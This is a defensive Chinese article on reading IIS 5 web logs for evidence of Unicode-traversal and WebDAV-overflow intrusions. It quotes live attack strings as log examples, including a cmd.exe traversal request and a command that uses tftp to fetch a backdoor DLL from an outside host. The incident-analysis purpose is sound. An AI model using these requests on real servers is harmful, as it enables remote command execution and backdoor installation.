虽然你补上了所有的安全补丁,但是谁又知道新的漏洞何时又会被发现呢?所以也应该做好系统日志的保护工作。
黑客罪证(二)
如果利用计划任务还可以实现定期备份系统日志。
Microsoft的IIS 5自公布到现在,被黑客利用的漏洞是很多的,像.ida/.idq、unicode、WebDavx3和一些未知的漏洞,我们备份日志的目的就是为了分析黑客入侵的行为,对于没有打好补丁包的系统被黑客成功入侵的日志记录分别对应如下。
unicode漏洞入侵日志记录
我们打开IIS5的Web服务的日志文件,日志文件默认位置在systemroot\system32\LogFiles\文件夹下,如图2所示是一个典型的Unicode漏洞入侵行为的日志记录,对于正常的Web访问,是通过80端口用GET命令获取Web数据,但通过非法的字符编码可绕过字符验证而得到不应该得到的信息。但补上相应的补丁可堵上此洞。
如通过下面的编码查看目标机的目录文件:
GET /_vti_bin/..5c../..5c../..5c../winnt/system32/cmd.exe /c+dir 200
则日志中会记录下此访问行为:
2003-03-01 08:47:47 192.168.0.1 - 192.168.0.218 80 GET
/_vti_bin/..5c../..5c../..5c../winnt/system32/cmd.exe
/c+dir 200 -
然而我们的日志中记录的一清二楚,是来自192.168.0.1的攻击者查看我们的目录。而下面一行是向我们的机器传送后门程序的记录:
2003-03-01 08:47:47 192.168.0.1 - 192.168.0.218 80 GET
/_vti_bin/..5c../..5c../..5c../winnt/system32/cmd.exe
/c+tftp20-i2061.48.10.12920GET20cool.dll20c:\httpodbc.dll
502 -
WebDavx3远程溢出日志记录
最近在黑客界有名的Wevdavx3漏洞是应用最广泛的,连打了最新SP3补丁的系统也不放过。如果系统遭受了此远程溢出的攻击行为,则日志记录如下所示:
2003-04-18 07:20:13 192.168.0.218 - 192.168.0.218 80 LOCK
/AAAAA……
就表示我们的Web服务受到了来自192.168.0.218的攻击,并锁定(即关闭)了WEB服务。后面的一些乱码字符是在溢出攻击时使用的偏移位猜过程。
上面都记录了入侵行为的IP地址,此IP地址并不能排除是攻击者使用了跳板,也就是说此IP很可能是“肉鸡”而不是攻击者的IP,但再查看其他日志文件,还是有可能追查出攻击者的位置。
不过笔者写到最后,还是想说一句,最好还是安装一个防火墙来记录和阻止黑客行为。
网友评论